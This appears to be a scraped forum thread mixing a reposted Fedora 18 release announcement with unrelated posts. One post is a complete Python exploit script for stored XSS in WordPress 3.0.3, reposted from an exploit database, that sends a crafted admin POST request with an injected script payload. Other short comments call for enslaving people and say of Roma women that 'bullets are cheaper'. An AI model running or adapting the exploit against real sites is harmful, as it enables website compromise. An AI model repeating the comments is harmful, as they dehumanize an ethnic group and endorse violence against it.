Advanced users and system administrators are of course still able to take advantage of more complex options. The general look and feel of the installation experience has been vastly upgraded, providing modern, clean, and comprehensible visuals during the process.

While the new installer should work well for most users in most configurations, there are inevitably a few teething problems in the first release of such a major revision. Known design limitations of the new installer in F18 are listed here:
http://fedoraproject.org/wiki/Anaconda/NewInstaller

Known significant bugs can be seen here:
http://fedoraproject.org/wiki/Common_F18_bugs#Installatio...

We welcome your constructive and specific feedback as we continue to work on refining the installer for future releases.

The upgrade process for Fedora now uses a new tool called FedUp (Fedora Upgrader). FedUp replaces pre-upgrade as well as the DVD methods for upgrading that have been used in previous Fedora releases. FedUp integrates with systemd to enable the upgrade functionality, doing the work in a pristine boot environment.

Of course, it wouldn't be a release announcement without a spotted -- er, dotted -- list of all the other fantastic features you'll see in Fedora 18:

=== For desktop users ===

Moooove over, stale desktops. We've got a small herd of choices udderly suited to your preferences.

* GNOME 3.6: The newest version of the GNOME desktop provides an enhanced Messaging Tray, support for Microsoft Exchange and Skydrive, and many more new features.

* Cinnamon: Fedora users now have the option of using Cinnamon, an advanced desktop environment based on GNOME 3. Cinnamon takes advantage of advanced features provided by the GNOME backend while providing users with a more traditional desktop experience.

* MATE Desktop: The MATE desktop provides users with a classic GNOME 2.x style user interface.
This desktop is perfect for users who have been running GNOME Classic or other window managers like XFCE as an alternative to GNOME 3. * KDE Plasma Workspaces 4.9: KDE Plasma Workspaces has been updated with many new features and improved stability and performance, including updates to the Dolphin File Manager, Konsole, and KWin Window manager. * Xfce 4.10: The lightweight and easy-to-use Xfce desktop has been updated to the 4.10 version with many bug fixes and enhancements, including a new MIME type editor, a reworked xfce4-run dialog, improved mouse settings, tabs in the Thunar file manager, and options to tile windows in xfwm4. Through all of these and more, Xfce continues to improve without getting in your way. Regardless of your desktop choice, Fedora 18 offers... * Improved storage management: SSM (System Storage Manager) is an easy-to-use command-line interface tool that presents a unified view of storage management tools. Devices, storage pools, volumes, and snapshots can now be managed with one tool, with the same syntax for managing all of your storage. (It's great for systems administrators, too!) === For developers === For developers there are all sorts of moo-tivating goodies: * Fresh versions of programming languages: Using Perl, Rails, or Python? All three of these languages are updated in Fedora 18. We've got Rails 3.2, Python 3.3, and Perl 5.16 fresh off the farm. * Clojure gets more love with the addition of tooling packages, including the Leinengen build tool, as well as Clojure libraries and frameworks, including Korma and Noir. * DragonEgg connects GCC and LLVM: DragonEgg is a plugin for the GCC compilers to allow use of the LLVM optimization and code-generation framework. DragonEgg provides software developers with more optimization and code-generation options for use with the GCC compilers. 
DragonEgg also allows GCC to be used for cross-compilation to target architectures supported by LLVM without requiring any special cross-compilation compiler packages. Fedora continues to develop and use GCC as the standard default compiler. === For systems administrators === Keep track of your infrastructure herds with these new features: * Offline system updates: Systems can now be updated offline, allowing for a more stable update of critical system components. This functionality is only integrated with GNOME Desktop Environment in this release but uses the distribution neutral PackageKit and systemd API's and hence can be made available for other desktop environments as well based on the interest from upstream developers. * Storage enhancements: StorageManagement is a collection of tools and libraries for managing storage area networks (SAN) and network attached storage (NAS). * Samba 4: This popular suite of tools has long provided file- and print-sharing services in heterogeneous operating system environments. The long-awaited Samba 4 introduces the first free and open source implementation of Active Directory protocols and includes a new scripting interface, allowing Python programs to interface to Samba's internals. * Riak: A fault-tolerant key-value store, Riak provides easy operations and predictable scaling as a NoSQL database. === For clouds and virtualization === Do you spend your days <strike>grazing</strike> gazing into the clouds? Here's just a taste of some of the cloud and virt features you'll see in Fedora 18: * Eucalyptus makes its first appearance in Fedora, with their 3.2 release included in F18. This platform for on-premise (private) Infrastructure-as-a-Service clouds uses existing infrastructure to create scalable and secure AWS-compatible cloud resources for compute, network, and storage. * OpenStack: With the Folsom release in Fedora 18, OpenStack continues to have the newest releases in Fedora. 
This open source cloud computing platform enables users to deploy their own cloud infrastructures for private or public cloud deployments. Heat, an incubated OpenStack project, is also available in F18, providing an API that enables the orchestration of cloud applications using file or web based templates. * oVirt Engine: The management application for the oVirt virtualization platform, oVirt Engine, is updated to the newest version, 3.1. This release includes extensive new features, including support for live snapshots, cloning virtual machines from snapshots, quotas, and more. * Suspend and resume support for virt guests: Virtual machines get love with this feature, enabling the ability to suspend and resume guests, with the close of a laptop lid or menu option or via the command line. And that's only the beginning. For a more complete list with details of all the new features in Fedora 18, steer over to: http://fedoraproject.org/wiki/Releases/18/FeatureList == Downloads, upgrades, documentation, and common bugs == The steaks are high--don't miss out on installing the best version of Fedora yet! Get it now: http://get.fedoraproject.org/ If you are upgrading from a previous release of Fedora, refer to: http://fedoraproject.org/wiki/Upgrading Fedora has replaced pre-upgrade with FedUp (excuse the pun.. or don't), a more robust solution, and pushed several bug fixes to older releases of Fedora to enable an easy upgrade to Fedora 18. Graze...er, gaze...upon the full release notes for Fedora 18, guides for several languages, and learn about known bugs and how to report new ones, here: http://docs.fedoraproject.org/ With all the changes to the installer, we particularly recommend reading the Installation Guide: http://docs.fedoraproject.org/en-US/Fedora/18/html/Instal... Everyone makes missteaks. 
Fedora 18 common bugs are documented at: http://fedoraproject.org/wiki/Common_F18_bugs This page includes information on several known bugs in the installer, so we recommend reading it before installing Fedora 18. == Fedora Spins == Fedora spins are alternate versions of Fedora tailored for various types of users via hand-picked application set or customizations, from desktop options to spins for those interested in gaming, robotics, or design software. More information on our various spins is available at: http://spins.fedoraproject.org == Contributing == There are many ways to contribute beyond bug reporting. You can help translate software and content, test and give feedback on software updates, write and edit documentation, design and do artwork, help with all sorts of promotional activities, and package free software for use by millions of Fedora users worldwide. To get started, visit http://join.fedoraproject.org today! == Fedora 19 == Even as we continue to provide updates with enhancements and bug fixes to improve the Fedora number experience, our next release, Fedora 19, is already being developed in parallel and has been open for active development for several months already. We have an early plan for release at the end of May 2013, and the final schedule for F19 is going to be based on the results of the planning process: https://fedoraproject.org/wiki/Releases/19/Schedule == Feature Deprecation == Fedora has always been full of great features, but sometimes we need to cull the herd. Saying good-bye is always hard, but here are the ones we had to put out to pasture this time around. * /etc/sysconfig Deprecations: Several system configurations have moved out of /etc/sysconfig. The goal of these changes is to reduce - as described in http://0pointer.de/blog/projects/the-new-configuration-fi... - the unnecessary differences between Linux distributions and share a standard location for common settings. For a full list of changes read the release notes. 
http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == Contact information == If you are a journalist or reporter, you can find additional information here: https://fedoraproject.org/wiki/Press Enjoy! -Robyn Bergeron Sursa: Fedora 18 released [LWN.net]
  21. Good idea, they shouldn't be killed, they should be made slaves.
  22. I don't get it anyway. That man was offering 300 RON to Gypsy women who got themselves sterilized. What law did he break? Why is he under arrest? Because he wasn't giving them a receipt?
  23. + I wonder if it knows how to boot from a mini-USB?
  24. [h=2]Wordpress 3.0.3 Stored XSS Exploit[/h]

#Exploit Title: Wordpress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised]
#Date: 14/01/2013
#Exploit Author: D35m0nd142
#Vendor Homepage: http://wordpress.org
#Version: 3.0.3
#Special thanks to Saif
#configuration is reconfigurable according to your own parameters.

#!/usr/bin/python
import sys,os,time,socket

os.system("clear")
print "-------------------------------------------------"
print " Wordpress 3.0.3 Stored XSS exploit "
print " Usage : ./exploit.py <wp website> <text> "
print " Created by D35m0nd142 "
print "-------------------------------------------------\n"
time.sleep(1.5)
wp_site = sys.argv[1]
text = sys.argv[2]
try:
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((sys.argv[1],80))
    request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F"
    request += sys.argv[1]
    request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F"
    request += sys.argv[1]
    request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145"
    print "--------------------------------------------------------------------------------------------------------------------------------------"
    print request
    print "--------------------------------------------------------------------------------------------------------------------------------------\n"
    length = len(request)
    poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text
    print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc
    time.sleep(0.7)
    print "Sending %s bytes of data . . " % length
    time.sleep(2)
    sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n")
    sock.send("Host: " + wp_site+"\r\n")
    sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n")
    sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n")
    sock.send("Accept-Language: en-us,en;q=0.5\r\n")
    sock.send("Accept-Encoding: gzip,deflate\r\n")
    sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n")
    sock.send("Keep-Alive: 300\r\n")
    sock.send("Proxy-Connection: keep-alive\r\n")
    sock.send("Referer:http://"+wp_site+"/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post'
    sock.send("Cookie:wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n")
    sock.send("Content-Type: application/x-www-form-urlencoded\r\n")
    sock.send("Content-Length:%d\n" %length)
    sock.send(request+"\r\n\r\n")
    print sock.recv(1024)
    print "\n[+] Exploit sent with success . Verify manually if the website has been exploited \n"
except:
    print "[!] Error in your configuration or website not vulnerable \n"

# 99F5C0A5380593CB 1337day.com [2013-01-15] 06CE9157954A5ED6 #

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  25. 300 RON/woman? Bullets are cheaper.